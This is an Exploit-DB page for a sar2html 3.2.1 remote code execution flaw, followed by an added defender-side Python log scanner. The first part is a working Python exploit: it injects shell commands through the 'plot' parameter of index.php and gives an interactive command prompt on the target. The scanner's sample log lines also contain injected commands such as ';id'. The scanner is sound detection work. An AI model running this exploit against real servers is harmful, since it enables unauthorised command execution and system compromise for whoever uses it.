sar2html 3.2.1 – ‘plot’ Remote Code Execution

  • Author: Musyoka Ian
    Date: 2021-01-04
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49344/
  • # Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
    # Date: 27-12-2020
    # Exploit Author: Musyoka Ian
    # Vendor Homepage: https://github.com/cemtan/sar2html
    # Software Link: https://sourceforge.net/projects/sar2html/
    # Version: 3.2.1
    # Tested on: Ubuntu 18.04.1
    
    #!/usr/bin/env python3
    
    import requests
    import re
    from cmd import Cmd
    
    url = input("Enter The url => ")
    
    class Terminal(Cmd):
        prompt = "Command => "
        def default(self, args):
            exploiter(args)
    
    def exploiter(cmd):
        global url
        sess = requests.session()
        output = sess.get(f"{url}/index.php?plot=;{cmd}")
        try:
            out = re.findall("<option value=(.*?)>", output.text)
        except:
            print ("Error!!")
        for ouut in out:
            if "There is no defined host..." not in ouut:
                if "null selected" not in ouut:
                    if "selected" not in ouut:
                        print (ouut)
        print ()
    
    if __name__ == ("__main__"):
        terminal = Terminal()
        terminal.cmdloop()
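
A defender-side check for the request this exploit sends (`index.php?plot=;<command>`), as an added example that is not part of the original exploit or of sar2html: it scans web server access log lines for `plot` values that carry shell metacharacters, including percent-encoded ones. Assumptions: combined-format access logs, the constructed sample entries below, and that legitimate `plot` values never contain these characters.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Characters that let a parameter value break out into a shell command line.
SHELL_META = re.compile(r"[;|&`\r\n]|\$\(")
# Client address and request target of a combined-format access log entry.
ENTRY = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries (documentation addresses, made-up values).
SAMPLE_LOG = [
    '203.0.113.9 - - [04/Jan/2021:10:00:01 +0000] "GET /index.php?plot=LINUX&host=web01 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Jan/2021:10:00:05 +0000] "GET /index.php?plot=;id HTTP/1.1" 200 5301 "-" "python-requests/2.25.1"',
    '198.51.100.7 - - [04/Jan/2021:10:00:09 +0000] "GET /index.php?plot=%3Buname%20-a HTTP/1.1" 200 5377 "-" "python-requests/2.25.1"',
    '203.0.113.9 - - [04/Jan/2021:10:01:12 +0000] "GET /style.css?plot=;x HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
]

def plot_values(query):
    """Yield each percent-decoded 'plot' value from a raw query string."""
    # Split by hand on '&' only: older urllib versions also split on ';',
    # which would hide exactly the value this check is looking for.
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) == "plot":
            yield unquote_plus(value)

def scan(lines):
    """Return (client, decoded plot value) for every suspicious request."""
    hits = []
    for line in lines:
        m = ENTRY.match(line)
        if not m:
            continue  # not a request line in the assumed log format
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/index.php"):
            continue  # only the endpoint named in the exploit is checked
        hits += [(client, v) for v in plot_values(parts.query)
                 if SHELL_META.search(v)]
    return hits

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}\tplot={value!r}")
```

The same pattern works as an allow-list input check in front of the application: reject any `plot` value for which `SHELL_META.search` matches before it reaches the PHP code.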